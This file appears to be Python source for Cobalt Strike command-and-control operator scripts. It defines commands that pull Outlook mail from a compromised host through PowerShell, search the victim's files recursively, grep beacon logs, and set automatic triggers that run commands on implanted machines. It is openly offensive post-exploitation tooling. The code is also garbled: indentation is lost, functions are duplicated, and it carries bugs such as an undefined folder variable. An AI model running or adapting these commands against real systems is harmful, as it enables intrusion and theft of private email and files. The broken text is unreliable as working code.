def _(*args):
parser = helpers.ArgumentParser(
prog='logs', description='Get logs for a user or computer')
parser.add_argument('-c', '--computer', help='Get logs for computer')
parser.add_argument('-u', '--user', help='Get logs for user')
parser.add_argument('out', help='Output file')
try:
args = parser.parse_args(args)
except:
return
finds = 0
for frame in aggressor.data_query('beaconlog'):
output_type = frame[0]
bid = frame[1]
if output_type == 'beacon_input':
user = frame[2]
data = frame[3]
time = convert_time(frame[4])
else:
data = frame[2]
time = convert_time(frame[3])
user = aggressor.beacon_info(bid, 'user')
computer = aggressor.beacon_info(bid, 'computer')
if user == args.user or computer == args.computer:
# it's a match!
finds += 1
# -o/--out
with open(args.out, 'a+') as fp:
fp.write(data)
engine.message('Wrote {} finds to {}'.format(finds, args.out))
def _(bid, *args):
parser = helpers.ArgumentParser(prog='logs', bid=bid, description='Get logs for a beacon')
parser.add_argument('out', help='Output file')
try: args = parser.parse_args(args)
except: return
finds = get_logs(args.out, bid=bid)
aggressor.blog2(bid, 'Wrote {} log entries to: {}'.format(finds, args.out))
def _(bid, *args):
parser = helpers.ArgumentParser(bid=bid, prog='outlook')
parser.add_argument('-f', '--folder', help='Folder name to grab')
parser.add_argument('-s', '--subject', help='Match subject line (glob)')
parser.add_argument('-t',
'--top',
metavar='N',
type=int,
help='Only show top N results')
parser.add_argument('-d',
'--dump',
action='store_true',
help='Get full dump')
parser.add_argument('-o', '--out', help='Output file')
try:
args = parser.parse_args(args)
except:
return
command = ''
command += outlook()
# -f/--folder
if args.folder:
# specified folder
#folder = args.folder.lstrip('\\')
command += helpers.code_string(r"""
$folder = $namespace.Folders.Item("{}")
""".format(folder))
else:
# inbox
command += helpers.code_string(r"""
$folder = $namespace.getDefaultFolder($folders::olFolderInBox)
""")
command += helpers.code_string(r"""
$folder.items""")
# -s/--subject
if args.subject:
command += ' | Where-Object {{$_.Subject -Like "{}"}}'.format(
args.subject)
# -t/--top
if args.top:
command += ' | select -First {}'.format(args.top)
# -d/--dump
if not args.dump:
# print summary only
#command += ' | Format-Table -AutoSize Subject, ReceivedTime, SenderName, SenderEmailAddress'
command += ' | Select-Object -Property Subject, ReceivedTime, SenderName, SenderEmailAddress'
# -o/--out
if args.out:
command += ' > {}'.format(args.out)
aggressor.bpowerpick(bid, command)
def _(*args):
parser = helpers.ArgumentParser(prog='logs', description='Get logs for a user or computer')
parser.add_argument('-c', '--computer', help='Get logs for computer')
parser.add_argument('-u', '--user', help='Get logs for user')
parser.add_argument('out', help='Output file')
try: args = parser.parse_args(args)
except: return
finds = get_logs(args.out, user=args.user, computer=args.computer)
engine.message('Wrote {} log entries to: {}'.format(finds, args.out))
def _(*args):
parser = helpers.ArgumentParser(prog='grep-logs', description='Grep beacon logs for a regex')
parser.add_argument('-o', '--out', help='Output file')
parser.add_argument('-w', '--whole', action='store_true', help='Show whole output')
parser.add_argument('regex', action='append', help='Search for regex')
try: args = parser.parse_args(args)
except: return
for regex in args.regex:
finds = 0
engine.message("Searching beacon logs for '{}'".format(regex))
for frame in aggressor.data_query('beaconlog'):
output_type = frame[0]
bid = frame[1]
if output_type == 'beacon_input':
user = frame[2]
data = frame[3]
time = convert_time(frame[4])
else:
data = frame[2]
time = convert_time(frame[3])
for log in split_output(data):
if re.search(regex, log, re.IGNORECASE):
beacon = '{}@{}'.format(aggressor.beacon_info(bid, 'user'), aggressor.beacon_info(bid, 'computer'))
# -w/--whole
if args.whole:
output = data
else:
output = log
# -o/--out
if args.out:
with open(args.out, 'a+') as fp:
fp.write(output)
else:
engine.message("Found beacon log matching '{}' from {} at {}:\n{}".format(regex, beacon, time, output))
finds += 1
if finds:
if args.out:
engine.message("Wrote {} finds containing '{}' to '{}'".format(finds, regex, args.out))
else:
engine.message("Found {} logs containing '{}'".format(finds, regex))
else:
engine.error("Didn't find any beacon logs containing '{}'".format(regex))
def _(bid, *args):
parser = helpers.ArgumentParser(bid=bid, prog='find')
parser.add_argument('-n', '--name', action='append', help='Name to match')
parser.add_argument('-i',
'--iname',
action='append',
help='Name to match (case insensitive)')
parser.add_argument('--not',
dest='not_',
action='store_true',
help='Invert --name and --iname')
parser.add_argument('-d',
'--days',
type=int,
help='Select files no more than DAYS old')
parser.add_argument('--dirs',
action='store_true',
help='Include directories')
parser.add_argument('-o', '--out', help='Output file')
parser.add_argument('-v',
'--verbose',
action='store_true',
help='Enable verbose')
parser.add_argument('--home',
action='store_true',
help='Search relative to %USERPROFILE% instead of .')
parser.add_argument('dir',
default='.',
help='Directory to search from (default: .)')
try:
args = parser.parse_args(args)
except:
return
# --home
if args.home:
directory = r'$env:userprofile\{}'.format(powershell_quote(args.dir))
else:
directory = powershell_quote(args.dir)
command = 'gci -Recurse -Path {} 2>$null'.format(directory)
# --dirs
if not args.dirs:
command += ' | where { ! $_.PSIsContainer }'
name_matches = []
# -n/--name
if args.name:
for name in args.name:
name_matches.append('$_.Name -Clike {}'.format(
powershell_quote(name)))
# -i/--iname
if args.iname:
for iname in args.iname:
name_matches.append('$_.Name -Like {}'.format(
powershell_quote(iname)))
if name_matches:
where_statement = ' -Or '.join(name_matches)
# --not
if args.not_:
where_statement = '-Not ({})'.format(where_statement)
command += " | Where-Object { " + where_statement + " }"
# -d/--days
if args.days:
command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }'
# -o/--out
if args.out:
command += ' > {}'.format(powershell_quote(args.out))
command += "; echo 'Finished searching in {}'".format(directory)
aggressor.btask(
bid, 'Tasked beacon to search for files in {}'.format(directory))
# -v/--verbose
aggressor.bpowerpick(bid, command, silent=not args.verbose)
def _(*args):
global _triggers
parser = helpers.ArgumentParser(prog='auto', event_log=True)
parser.add_argument('-b',
'--bid',
action='append',
type=int,
help='Bid to trigger on')
parser.add_argument('-u',
'--user',
action='append',
help='User to trigger on')
parser.add_argument('-c',
'--computer',
action='append',
help='Computer to trigger on')
parser.add_argument('-a',
'--all',
action='store_true',
help='Trigger on all beacons')
parser.add_argument(
'-i',
'--initial',
action='store_true',
help='Trigger on initial beacon (default for --user and --computer)')
parser.add_argument('-o',
'--output',
action='store_true',
help='Trigger on beacon output (default for --bid)')
#parser.add_argument('-t', '--timed', metavar='SECONDS', type=int, help='Trigger every X seconds')
parser.add_argument('-r', '--remove', type=int, help='Remove a trigger')
parser.add_argument('-l',
'--list',
action='store_true',
help='List triggers')
parser.add_argument('command', nargs='*', help='Command to run')
try:
args = parser.parse_args(args)
except:
return
# -r/--remove
if args.remove:
if args.remove < len(_triggers) and args.remove >= 0:
trigger = _triggers[args.remove]
if trigger['type'] == timed:
trigger['timer'].stop()
del _triggers[args.remove]
bot.say('Removed trigger {}'.format(args.remove))
else:
bot.error('Trigger {} does not exist'.format(args.remove))
# -l/--list
elif args.list:
output = 'Triggers:\n'
for num, trigger in enumerate(_triggers):
output += '{}: {}\n'.format(num, str(trigger))
bot.say(output)
else:
if not (args.bid or args.user or args.computer or args.all):
bot.error('Specify --bid, --user, --computer, or --all')
return
if not args.command:
bot.error('Specify command')
return
trigger = {}
trigger['command'] = args.command
if args.bid:
trigger['bids'] = args.bid
if args.user:
trigger['users'] = args.user
if args.computer:
trigger['computers'] = args.computer
if args.all:
trigger['all'] = True
# -o/--output
if args.output:
# on output
trigger['type'] = 'output'
# -t/--timed
elif args.timed:
# timed
trigger['type'] = 'timed'
trigger['time'] = args.timed
trigger['timer'] = TriggerTimer(trigger)
trigger['timer'].start()
else:
# on initial
trigger['type'] = 'initial'
_triggers.append(trigger)
engine.debug('Adding trigger: {}'.format(str(trigger)))
bot.good('Added trigger')
def _(bid, *args):
parser = helpers.ArgumentParser(bid=bid, prog='find')
parser.add_argument('-n', '--name', action='append', help='Name to match')
parser.add_argument('-i',
'--iname',
action='append',
help='Name to match (case insensitive)')
parser.add_argument('--not',
dest='not_',
action='store_true',
help='Invert --name and --iname')
parser.add_argument('-d',
'--days',
type=int,
help='Select files no more than DAYS old')
parser.add_argument('--dirs',
action='store_true',
help='Include directories')
parser.add_argument('-o', '--out', help='Output file')
parser.add_argument('dir',
default='.',
help='Directory to search from (default: .)')
try:
args = parser.parse_args(args)
except:
return
command = 'gci -Recurse -Path "{}" 2>$null'.format(args.dir)
# --dirs
if not args.dirs:
command += ' | where { ! $_.PSIsContainer }'
name_matches = []
# -n/--name
if args.name:
for name in args.name:
name_matches.append('$_.Name -Clike "{}"'.format(name))
# -i/--iname
if args.iname:
for iname in args.iname:
name_matches.append('$_.Name -Like "{}"'.format(iname))
if name_matches:
where_statement = ' -Or '.join(name_matches)
# --not
if args.not_:
where_statement = '-Not ({})'.format(where_statement)
command += " | Where-Object { " + where_statement + " }"
# -d/--days
if args.days:
command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }'
# -o/--out
if args.out:
command += ' > "{}"'.format(args.out)
aggressor.bpowerpick(bid, command)